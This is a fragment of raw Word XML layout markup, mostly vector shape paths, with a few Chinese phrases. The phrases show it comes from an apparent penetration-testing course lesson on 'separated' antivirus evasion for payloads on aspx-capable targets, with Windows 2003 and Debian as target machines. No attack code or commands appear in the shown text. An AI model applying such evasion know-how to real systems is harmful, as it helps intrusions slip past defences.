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89.400pt;margin-top:148.199pt;width:7.800pt;height:7.200pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId7" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:89.400pt;margin-top:169.199pt;width:7.800pt;height:7.200pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId8" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:89.400pt;margin-top:274.200pt;width:7.800pt;height:7.200pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId9" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:89.400pt;margin-top:295.200pt;width:7.800pt;height:7.200pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId10" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:369.600pt;width:304.800pt;height:241.8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关于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>分离免杀，其他章节参考：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68课时payload特征，行为分离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免杀思路第一季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69课时payload分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离免杀思路第二季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本季针对目标环境支持a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spx进行分离免杀。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de3f29"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>机背景：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2307" w:right="7820" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="35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-85"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="37"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2003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Debi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an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-52"/>
        </w:rPr>
        <w:t> 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2003：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236.874pt;width:4.125pt;height:16.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,4737" coordsize="82,322">
        <v:shape style="position:absolute;left:1177;top:4737;width:82;height:322" coordorigin="1177,4737" coordsize="82,322" path="m1217,4751l1217,4751,1217,4751,1217,4751,1217,4751,1217,4751,1217,4751,1217,4751,1217,4751,1217,4751,1217,4752,1217,4752,1217,4752,1217,4752,1217,4752,1217,4752,1217,4752,1217,4752,1217,4752,1217,4752,1217,4753,1217,4753,1217,4753,1217,4753,1217,4754,1217,4754,1217,4754,1217,4755,1217,4755,1217,4755,1217,4756,1217,4756,1217,4757,1217,4757,1217,4758,1217,4758,1217,4759,1217,4760,1217,4760,1217,4761,1217,4762,1217,4763,1217,4764,1217,4765,1217,4766,1217,4767,1217,4768,1217,4769,1217,4770,1217,4771,1217,4772,1217,4774,1217,4775,1217,4776,1217,4778,1217,4779,1217,4781,1217,4783,1217,4784,1217,4786,1217,4788,1217,4790,1217,4792,1217,4794,1217,4796,1217,4798,1217,4800,1217,4803,1217,4805,1217,4807,1217,4810,1217,4812,1217,4815,1217,4818,1217,4821,1217,4824,1217,4827,1217,4830,1217,4833,1217,4836,1217,4839,1217,4843,1217,4846,1217,4850,1217,4853,1217,4857,1217,4861,1217,4865,1217,4869,1217,4873,1217,4877,1217,4881,1217,4886,1217,4890,1217,4895,1217,4899,1217,4904,1217,4909,1217,4914,1217,4919,1217,4924,1217,4930,1217,4935,1217,4940,1217,4946,1217,4952,1217,4958,1217,4964,1217,4970,1217,4976,1217,4982,1217,4988,1217,4995,1217,5002,1217,5008,1217,5015,1217,5022,1217,5029,1217,5037,1217,5044,1217,5052e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:58.874pt;margin-top:251.874pt;width:4.125pt;height:16.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,5037" coordsize="82,322">
        <v:shape style="position:absolute;left:1177;top:5037;width:82;height:322" coordorigin="1177,5037" coordsize="82,322" path="m1217,5052l1217,5052,1217,5052,1217,5052,1217,5052,1217,5052,1217,5052,1217,5052,1217,5052,1217,5052,1217,5052,1217,5052,1217,5052,1217,5052,1217,5052,1217,5052,1217,5052,1217,5052,1217,5052,1217,5053,1217,5053,1217,5053,1217,5053,1217,5053,1217,5054,1217,5054,1217,5054,1217,5055,1217,5055,1217,5055,1217,5056,1217,5056,1217,5057,1217,5057,1217,5058,1217,5059,1217,5059,1217,5060,1217,5061,1217,5061,1217,5062,1217,5063,1217,5064,1217,5065,1217,5066,1217,5067,1217,5068,1217,5069,1217,5070,1217,5071,1217,5072,1217,5074,1217,5075,1217,5077,1217,5078,1217,5080,1217,5081,1217,5083,1217,5085,1217,5086,1217,5088,1217,5090,1217,5092,1217,5094,1217,5096,1217,5098,1217,5100,1217,5103,1217,5105,1217,5108,1217,5110,1217,5113,1217,5115,1217,5118,1217,5121,1217,5124,1217,5127,1217,5130,1217,5133,1217,5136,1217,5139,1217,5143,1217,5146,1217,5150,1217,5153,1217,5157,1217,5161,1217,5165,1217,5169,1217,5173,1217,5177,1217,5181,1217,5186,1217,5190,1217,5195,1217,5199,1217,5204,1217,5209,1217,5214,1217,5219,1217,5224,1217,5230,1217,5235,1217,5241,1217,5246,1217,5252,1217,5258,1217,5264,1217,5270,1217,5276,1217,5282,1217,5289,1217,5295,1217,5302,1217,5309,1217,5315,1217,5322,1217,5330,1217,5337,1217,5344,1217,5352e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:58.874pt;margin-top:266.874pt;width:4.125pt;height:16.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,5337" coordsize="82,322">
        <v:shape style="position:absolute;left:1177;top:5337;width:82;height:322" coordorigin="1177,5337" coordsize="82,322" path="m1217,5352l1217,5352,1217,5352,1217,5352,1217,5352,1217,5352,1217,5352,1217,5352,1217,5352,1217,5352,1217,5352,1217,5352,1217,5352,1217,5352,1217,5352,1217,5352,1217,5352,1217,5352,1217,5353,1217,5353,1217,5353,1217,5353,1217,5353,1217,5354,1217,5354,1217,5354,1217,5354,1217,5355,1217,5355,1217,5356,1217,5356,1217,5357,1217,5357,1217,5358,1217,5358,1217,5359,1217,5359,1217,5360,1217,5361,1217,5361,1217,5362,1217,5363,1217,5364,1217,5365,1217,5366,1217,5367,1217,5368,1217,5369,1217,5370,1217,5371,1217,5373,1217,5374,1217,5375,1217,5377,1217,5378,1217,5380,1217,5381,1217,5383,1217,5385,1217,5386,1217,5388,1217,5390,1217,5392,1217,5394,1217,5396,1217,5398,1217,5401,1217,5403,1217,5405,1217,5408,1217,5410,1217,5413,1217,5415,1217,5418,1217,5421,1217,5424,1217,5427,1217,5430,1217,5433,1217,5436,1217,5440,1217,5443,1217,5446,1217,5450,1217,5454,1217,5457,1217,5461,1217,5465,1217,5469,1217,5473,1217,5477,1217,5482,1217,5486,1217,5490,1217,5495,1217,5500,1217,5504,1217,5509,1217,5514,1217,5519,1217,5525,1217,5530,1217,5535,1217,5541,1217,5546,1217,5552,1217,5558,1217,5564,1217,5570,1217,5576,1217,5582,1217,5589,1217,5595,1217,5602,1217,5609,1217,5616,1217,5623,1217,5630,1217,5637,1217,5644,1217,5652e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:58.874pt;margin-top:281.874pt;width:4.125pt;height:16.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,5637" coordsize="82,322">
        <v:shape style="position:absolute;left:1177;top:5637;width:82;height:322" coordorigin="1177,5637" coordsize="82,322" path="m1217,5652l1217,5652,1217,5652,1217,5652,1217,5652,1217,5652,1217,5652,1217,5652,1217,5652,1217,5652,1217,5652,1217,5652,1217,5652,1217,5652,1217,5652,1217,5652,1217,5652,1217,5653,1217,5653,1217,5653,1217,5653,1217,5653,1217,5653,1217,5654,1217,5654,1217,5654,1217,5655,1217,5655,1217,5655,1217,5656,1217,5656,1217,5657,1217,5657,1217,5658,1217,5658,1217,5659,1217,5659,1217,5660,1217,5661,1217,5662,1217,5662,1217,5663,1217,5664,1217,5665,1217,5666,1217,5667,1217,5668,1217,5669,1217,5670,1217,5672,1217,5673,1217,5674,1217,5675,1217,5677,1217,5678,1217,5680,1217,5681,1217,5683,1217,5685,1217,5687,1217,5688,1217,5690,1217,5692,1217,5694,1217,5696,1217,5699,1217,5701,1217,5703,1217,5705,1217,5708,1217,5710,1217,5713,1217,5716,1217,5718,1217,5721,1217,5724,1217,5727,1217,5730,1217,5733,1217,5736,1217,5740,1217,5743,1217,5747,1217,5750,1217,5754,1217,5757,1217,5761,1217,5765,1217,5769,1217,5773,1217,5777,1217,5782,1217,5786,1217,5791,1217,5795,1217,5800,1217,5805,1217,5809,1217,5814,1217,5819,1217,5825,1217,5830,1217,5835,1217,5841,1217,5846,1217,5852,1217,5858,1217,5864,1217,5870,1217,5876,1217,5883,1217,5889,1217,5895,1217,5902,1217,5909,1217,5916,1217,5923,1217,5930,1217,5937,1217,5944,1217,5952e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:58.874pt;margin-top:296.874pt;width:4.125pt;height:16.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,5937" coordsize="82,322">
        <v:shape style="position:absolute;left:1177;top:5937;width:82;height:322" coordorigin="1177,5937" coordsize="82,322" path="m1217,5952l1217,5952,1217,5952,1217,5952,1217,5952,1217,5952,1217,5952,1217,5952,1217,5952,1217,5952,1217,5952,1217,5952,1217,5952,1217,5952,1217,5952,1217,5952,1217,5953,1217,5953,1217,5953,1217,5953,1217,5953,1217,5953,1217,5954,1217,5954,1217,5954,1217,5954,1217,5955,1217,5955,1217,5956,1217,5956,1217,5956,1217,5957,1217,5957,1217,5958,1217,5958,1217,5959,1217,5960,1217,5960,1217,5961,1217,5962,1217,5963,1217,5963,1217,5964,1217,5965,1217,5966,1217,5967,1217,5968,1217,5969,1217,5970,1217,5972,1217,5973,1217,5974,1217,5976,1217,5977,1217,5979,1217,5980,1217,5982,1217,5983,1217,5985,1217,5987,1217,5989,1217,5990,1217,5992,1217,5994,1217,5997,1217,5999,1217,6001,1217,6003,1217,6006,1217,6008,1217,6011,1217,6013,1217,6016,1217,6018,1217,6021,1217,6024,1217,6027,1217,6030,1217,6033,1217,6037,1217,6040,1217,6043,1217,6047,1217,6050,1217,6054,1217,6058,1217,6061,1217,6065,1217,6069,1217,6073,1217,6078,1217,6082,1217,6086,1217,6091,1217,6095,1217,6100,1217,6105,1217,6110,1217,6115,1217,6120,1217,6125,1217,6130,1217,6136,1217,6141,1217,6147,1217,6152,1217,6158,1217,6164,1217,6170,1217,6176,1217,6183,1217,6189,1217,6196,1217,6202,1217,6209,1217,6216,1217,6223,1217,6230,1217,6237,1217,6245,1217,6252e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:58.874pt;margin-top:311.874pt;width:4.125pt;height:16.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,6237" coordsize="82,322">
        <v:shape style="position:absolute;left:1177;top:6237;width:82;height:322" coordorigin="1177,6237" coordsize="82,322" path="m1217,6252l1217,6252,1217,6252,1217,6252,1217,6252,1217,6252,1217,6252,1217,6252,1217,6252,1217,6252,1217,6252,1217,6252,1217,6252,1217,6252,1217,6253,1217,6253,1217,6253,1217,6253,1217,6253,1217,6253,1217,6253,1217,6254,1217,6254,1217,6254,1217,6254,1217,6255,1217,6255,1217,6255,1217,6256,1217,6256,1217,6256,1217,6257,1217,6257,1217,6258,1217,6259,1217,6259,1217,6260,1217,6260,1217,6261,1217,6262,1217,6263,1217,6264,1217,6264,1217,6265,1217,6266,1217,6267,1217,6268,1217,6269,1217,6271,1217,6272,1217,6273,1217,6274,1217,6276,1217,6277,1217,6279,1217,6280,1217,6282,1217,6283,1217,6285,1217,6287,1217,6289,1217,6291,1217,6293,1217,6295,1217,6297,1217,6299,1217,6301,1217,6303,1217,6306,1217,6308,1217,6311,1217,6313,1217,6316,1217,6319,1217,6321,1217,6324,1217,6327,1217,6330,1217,6333,1217,6337,1217,6340,1217,6343,1217,6347,1217,6350,1217,6354,1217,6358,1217,6362,1217,6365,1217,6369,1217,6374,1217,6378,1217,6382,1217,6386,1217,6391,1217,6395,1217,6400,1217,6405,1217,6410,1217,6415,1217,6420,1217,6425,1217,6430,1217,6436,1217,6441,1217,6447,1217,6453,1217,6458,1217,6464,1217,6470,1217,6477,1217,6483,1217,6489,1217,6496,1217,6502,1217,6509,1217,6516,1217,6523,1217,6530,1217,6537,1217,6545,1217,6552e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:58.874pt;margin-top:326.874pt;width:4.125pt;height:16.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,6537" coordsize="82,322">
        <v:shape style="position:absolute;left:1177;top:6537;width:82;height:322" coordorigin="1177,6537" coordsize="82,322" path="m1217,6552l1217,6552,1217,6552,1217,6552,1217,6552,1217,6552,1217,6552,1217,6552,1217,6552,1217,6552,1217,6552,1217,6552,1217,6553,1217,6553,1217,6553,1217,6553,1217,6553,1217,6553,1217,6553,1217,6553,1217,6554,1217,6554,1217,6554,1217,6554,1217,6554,1217,6555,1217,6555,1217,6555,1217,6556,1217,6556,1217,6557,1217,6557,1217,6558,1217,6558,1217,6559,1217,6559,1217,6560,1217,6561,1217,6561,1217,6562,1217,6563,1217,6564,1217,6565,1217,6565,1217,6566,1217,6567,1217,6569,1217,6570,1217,6571,1217,6572,1217,6573,1217,6575,1217,6576,1217,6577,1217,6579,1217,6580,1217,6582,1217,6584,1217,6585,1217,6587,1217,6589,1217,6591,1217,6593,1217,6595,1217,6597,1217,6599,1217,6601,1217,6604,1217,6606,1217,6608,1217,6611,1217,6613,1217,6616,1217,6619,1217,6622,1217,6624,1217,6627,1217,6630,1217,6634,1217,6637,1217,6640,1217,6643,1217,6647,1217,6651,1217,6654,1217,6658,1217,6662,1217,6666,1217,6670,1217,6674,1217,6678,1217,6682,1217,6687,1217,6691,1217,6696,1217,6700,1217,6705,1217,6710,1217,6715,1217,6720,1217,6725,1217,6730,1217,6736,1217,6741,1217,6747,1217,6753,1217,6758,1217,6764,1217,6770,1217,6777,1217,6783,1217,6789,1217,6796,1217,6803,1217,6809,1217,6816,1217,6823,1217,6830,1217,6838,1217,6845,1217,6852e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:58.874pt;margin-top:341.874pt;width:4.125pt;height:16.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,6837" coordsize="82,322">
        <v:shape style="position:absolute;left:1177;top:6837;width:82;height:322" coordorigin="1177,6837" coordsize="82,322" path="m1217,6852l1217,6852,1217,6852,1217,6852,1217,6852,1217,6852,1217,6852,1217,6852,1217,6853,1217,6853,1217,6853,1217,6853,1217,6853,1217,6853,1217,6853,1217,6853,1217,6853,1217,6853,1217,6853,1217,6853,1217,6854,1217,6854,1217,6854,1217,6854,1217,6855,1217,6855,1217,6855,1217,6856,1217,6856,1217,6856,1217,6857,1217,6857,1217,6858,1217,6858,1217,6859,1217,6859,1217,6860,1217,6861,1217,6861,1217,6862,1217,6863,1217,6864,1217,6865,1217,6866,1217,6867,1217,6868,1217,6869,1217,6870,1217,6871,1217,6872,1217,6873,1217,6875,1217,6876,1217,6877,1217,6879,1217,6880,1217,6882,1217,6884,1217,6885,1217,6887,1217,6889,1217,6891,1217,6893,1217,6895,1217,6897,1217,6899,1217,6901,1217,6904,1217,6906,1217,6908,1217,6911,1217,6914,1217,6916,1217,6919,1217,6922,1217,6925,1217,6928,1217,6931,1217,6934,1217,6937,1217,6940,1217,6944,1217,6947,1217,6951,1217,6954,1217,6958,1217,6962,1217,6966,1217,6970,1217,6974,1217,6978,1217,6982,1217,6987,1217,6991,1217,6996,1217,7000,1217,7005,1217,7010,1217,7015,1217,7020,1217,7025,1217,7031,1217,7036,1217,7041,1217,7047,1217,7053,1217,7059,1217,7065,1217,7071,1217,7077,1217,7083,1217,7090,1217,7096,1217,7103,1217,7109,1217,7116,1217,7123,1217,7130,1217,7138,1217,7145,1217,7153e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:58.874pt;margin-top:356.874pt;width:4.125pt;height:16.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,7137" coordsize="82,322">
        <v:shape style="position:absolute;left:1177;top:7137;width:82;height:322" coordorigin="1177,7137" coordsize="82,322" path="m1217,7153l1217,7153,1217,7153,1217,7153,1217,7153,1217,7153,1217,7153,1217,7153,1217,7153,1217,7153,1217,7153,1217,7153,1217,7153,1217,7153,1217,7153,1217,7153,1217,7153,1217,7153,1217,7153,1217,7154,1217,7154,1217,7154,1217,7154,1217,7154,1217,7155,1217,7155,1217,7155,1217,7156,1217,7156,1217,7157,1217,7157,1217,7157,1217,7158,1217,7158,1217,7159,1217,7160,1217,7160,1217,7161,1217,7162,1217,7162,1217,7163,1217,7164,1217,7165,1217,7166,1217,7167,1217,7168,1217,7169,1217,7170,1217,7171,1217,7172,1217,7174,1217,7175,1217,7176,1217,7178,1217,7179,1217,7181,1217,7182,1217,7184,1217,7186,1217,7187,1217,7189,1217,7191,1217,7193,1217,7195,1217,7197,1217,7199,1217,7202,1217,7204,1217,7206,1217,7209,1217,7211,1217,7214,1217,7216,1217,7219,1217,7222,1217,7225,1217,7228,1217,7231,1217,7234,1217,7237,1217,7240,1217,7244,1217,7247,1217,7251,1217,7254,1217,7258,1217,7262,1217,7266,1217,7270,1217,7274,1217,7278,1217,7282,1217,7287,1217,7291,1217,7296,1217,7301,1217,7305,1217,7310,1217,7315,1217,7320,1217,7325,1217,7331,1217,7336,1217,7342,1217,7347,1217,7353,1217,7359,1217,7365,1217,7371,1217,7377,1217,7383,1217,7390,1217,7396,1217,7403,1217,7410,1217,7416,1217,7423,1217,7431,1217,7438,1217,7445,1217,7453e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:58.874pt;margin-top:371.874pt;width:4.125pt;height:16.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,7437" coordsize="82,322">
        <v:shape style="position:absolute;left:1177;top:7437;width:82;height:322" coordorigin="1177,7437" coordsize="82,322" path="m1217,7453l1217,7453,1217,7453,1217,7453,1217,7453,1217,7453,1217,7453,1217,7453,1217,7453,1217,7453,1217,7453,1217,7453,1217,7453,1217,7453,1217,7453,1217,7453,1217,7453,1217,7453,1217,7454,1217,7454,1217,7454,1217,7454,1217,7454,1217,7455,1217,7455,1217,7455,1217,7456,1217,7456,1217,7456,1217,7457,1217,7457,1217,7458,1217,7458,1217,7459,1217,7459,1217,7460,1217,7460,1217,7461,1217,7462,1217,7463,1217,7463,1217,7464,1217,7465,1217,7466,1217,7467,1217,7468,1217,7469,1217,7470,1217,7471,1217,7472,1217,7474,1217,7475,1217,7476,1217,7478,1217,7479,1217,7481,1217,7482,1217,7484,1217,7486,1217,7488,1217,7489,1217,7491,1217,7493,1217,7495,1217,7497,1217,7499,1217,7502,1217,7504,1217,7506,1217,7509,1217,7511,1217,7514,1217,7517,1217,7519,1217,7522,1217,7525,1217,7528,1217,7531,1217,7534,1217,7537,1217,7541,1217,7544,1217,7547,1217,7551,1217,7555,1217,7558,1217,7562,1217,7566,1217,7570,1217,7574,1217,7578,1217,7583,1217,7587,1217,7591,1217,7596,1217,7601,1217,7605,1217,7610,1217,7615,1217,7620,1217,7626,1217,7631,1217,7636,1217,7642,1217,7647,1217,7653,1217,7659,1217,7665,1217,7671,1217,7677,1217,7683,1217,7690,1217,7696,1217,7703,1217,7710,1217,7717,1217,7724,1217,7731,1217,7738,1217,7745,1217,7753e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:58.874pt;margin-top:386.874pt;width:4.125pt;height:16.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,7737" coordsize="82,322">
        <v:shape style="position:absolute;left:1177;top:7737;width:82;height:322" coordorigin="1177,7737" coordsize="82,322" path="m1217,7753l1217,7753,1217,7753,1217,7753,1217,7753,1217,7753,1217,7753,1217,7753,1217,7753,1217,7753,1217,7753,1217,7753,1217,7753,1217,7753,1217,7753,1217,7753,1217,7754,1217,7754,1217,7754,1217,7754,1217,7754,1217,7754,1217,7755,1217,7755,1217,7755,1217,7755,1217,7756,1217,7756,1217,7756,1217,7757,1217,7757,1217,7758,1217,7758,1217,7759,1217,7759,1217,7760,1217,7761,1217,7761,1217,7762,1217,7763,1217,7763,1217,7764,1217,7765,1217,7766,1217,7767,1217,7768,1217,7769,1217,7770,1217,7771,1217,7773,1217,7774,1217,7775,1217,7777,1217,7778,1217,7779,1217,7781,1217,7783,1217,7784,1217,7786,1217,7788,1217,7789,1217,7791,1217,7793,1217,7795,1217,7797,1217,7800,1217,7802,1217,7804,1217,7806,1217,7809,1217,7811,1217,7814,1217,7817,1217,7819,1217,7822,1217,7825,1217,7828,1217,7831,1217,7834,1217,7837,1217,7841,1217,7844,1217,7848,1217,7851,1217,7855,1217,7858,1217,7862,1217,7866,1217,7870,1217,7874,1217,7878,1217,7883,1217,7887,1217,7892,1217,7896,1217,7901,1217,7906,1217,7910,1217,7915,1217,7921,1217,7926,1217,7931,1217,7936,1217,7942,1217,7948,1217,7953,1217,7959,1217,7965,1217,7971,1217,7977,1217,7984,1217,7990,1217,7996,1217,8003,1217,8010,1217,8017,1217,8024,1217,8031,1217,8038,1217,8046,1217,8053e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:58.874pt;margin-top:401.874pt;width:4.125pt;height:16.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,8037" coordsize="82,322">
        <v:shape style="position:absolute;left:1177;top:8037;width:82;height:322" coordorigin="1177,8037" coordsize="82,322" path="m1217,8053l1217,8053,1217,8053,1217,8053,1217,8053,1217,8053,1217,8053,1217,8053,1217,8053,1217,8053,1217,8053,1217,8053,1217,8053,1217,8053,1217,8053,1217,8054,1217,8054,1217,8054,1217,8054,1217,8054,1217,8054,1217,8054,1217,8055,1217,8055,1217,8055,1217,8056,1217,8056,1217,8056,1217,8057,1217,8057,1217,8057,1217,8058,1217,8058,1217,8059,1217,8059,1217,8060,1217,8061,1217,8061,1217,8062,1217,8063,1217,8064,1217,8064,1217,8065,1217,8066,1217,8067,1217,8068,1217,8069,1217,8070,1217,8072,1217,8073,1217,8074,1217,8075,1217,8077,1217,8078,1217,8080,1217,8081,1217,8083,1217,8084,1217,8086,1217,8088,1217,8090,1217,8092,1217,8093,1217,8096,1217,8098,1217,8100,1217,8102,1217,8104,1217,8107,1217,8109,1217,8112,1217,8114,1217,8117,1217,8120,1217,8122,1217,8125,1217,8128,1217,8131,1217,8134,1217,8138,1217,8141,1217,8144,1217,8148,1217,8151,1217,8155,1217,8159,1217,8162,1217,8166,1217,8170,1217,8174,1217,8179,1217,8183,1217,8187,1217,8192,1217,8196,1217,8201,1217,8206,1217,8211,1217,8216,1217,8221,1217,8226,1217,8231,1217,8237,1217,8242,1217,8248,1217,8253,1217,8259,1217,8265,1217,8271,1217,8277,1217,8284,1217,8290,1217,8297,1217,8303,1217,8310,1217,8317,1217,8324,1217,8331,1217,8338,1217,8346,1217,8353e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:58.874pt;margin-top:416.874pt;width:4.125pt;height:16.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,8337" coordsize="82,322">
        <v:shape style="position:absolute;left:1177;top:8337;width:82;height:322" coordorigin="1177,8337" coordsize="82,322" path="m1217,8353l1217,8353,1217,8353,1217,8353,1217,8353,1217,8353,1217,8353,1217,8353,1217,8353,1217,8353,1217,8353,1217,8353,1217,8353,1217,8354,1217,8354,1217,8354,1217,8354,1217,8354,1217,8354,1217,8354,1217,8354,1217,8355,1217,8355,1217,8355,1217,8355,1217,8356,1217,8356,1217,8356,1217,8357,1217,8357,1217,8358,1217,8358,1217,8359,1217,8359,1217,8360,1217,8360,1217,8361,1217,8362,1217,8362,1217,8363,1217,8364,1217,8365,1217,8365,1217,8366,1217,8367,1217,8368,1217,8369,1217,8371,1217,8372,1217,8373,1217,8374,1217,8375,1217,8377,1217,8378,1217,8380,1217,8381,1217,8383,1217,8384,1217,8386,1217,8388,1217,8390,1217,8392,1217,8394,1217,8396,1217,8398,1217,8400,1217,8402,1217,8404,1217,8407,1217,8409,1217,8412,1217,8414,1217,8417,1217,8420,1217,8422,1217,8425,1217,8428,1217,8431,1217,8435,1217,8438,1217,8441,1217,8444,1217,8448,1217,8451,1217,8455,1217,8459,1217,8463,1217,8466,1217,8470,1217,8475,1217,8479,1217,8483,1217,8487,1217,8492,1217,8496,1217,8501,1217,8506,1217,8511,1217,8516,1217,8521,1217,8526,1217,8531,1217,8537,1217,8542,1217,8548,1217,8554,1217,8559,1217,8565,1217,8571,1217,8578,1217,8584,1217,8590,1217,8597,1217,8603,1217,8610,1217,8617,1217,8624,1217,8631,1217,8638,1217,8646,1217,8653e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:58.874pt;margin-top:431.874pt;width:4.125pt;height:16.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,8637" coordsize="82,322">
        <v:shape style="position:absolute;left:1177;top:8637;width:82;height:322" coordorigin="1177,8637" coordsize="82,322" path="m1217,8653l1217,8653,1217,8653,1217,8653,1217,8653,1217,8653,1217,8653,1217,8653,1217,8653,1217,8653,1217,8653,1217,8654,1217,8654,1217,8654,1217,8654,1217,8654,1217,8654,1217,8654,1217,8654,1217,8654,1217,8655,1217,8655,1217,8655,1217,8655,1217,8656,1217,8656,1217,8656,1217,8656,1217,8657,1217,8657,1217,8658,1217,8658,1217,8659,1217,8659,1217,8660,1217,8660,1217,8661,1217,8662,1217,8662,1217,8663,1217,8664,1217,8665,1217,8666,1217,8667,1217,8668,1217,8669,1217,8670,1217,8671,1217,8672,1217,8673,1217,8674,1217,8676,1217,8677,1217,8678,1217,8680,1217,8681,1217,8683,1217,8685,1217,8686,1217,8688,1217,8690,1217,8692,1217,8694,1217,8696,1217,8698,1217,8700,1217,8702,1217,8705,1217,8707,1217,8709,1217,8712,1217,8714,1217,8717,1217,8720,1217,8723,1217,8726,1217,8729,1217,8732,1217,8735,1217,8738,1217,8741,1217,8745,1217,8748,1217,8752,1217,8755,1217,8759,1217,8763,1217,8767,1217,8771,1217,8775,1217,8779,1217,8783,1217,8788,1217,8792,1217,8797,1217,8801,1217,8806,1217,8811,1217,8816,1217,8821,1217,8826,1217,8831,1217,8837,1217,8842,1217,8848,1217,8854,1217,8860,1217,8865,1217,8872,1217,8878,1217,8884,1217,8890,1217,8897,1217,8904,1217,8910,1217,8917,1217,8924,1217,8931,1217,8939,1217,8946,1217,8954e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:58.874pt;margin-top:446.874pt;width:4.125pt;height:17.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,8937" coordsize="82,342">
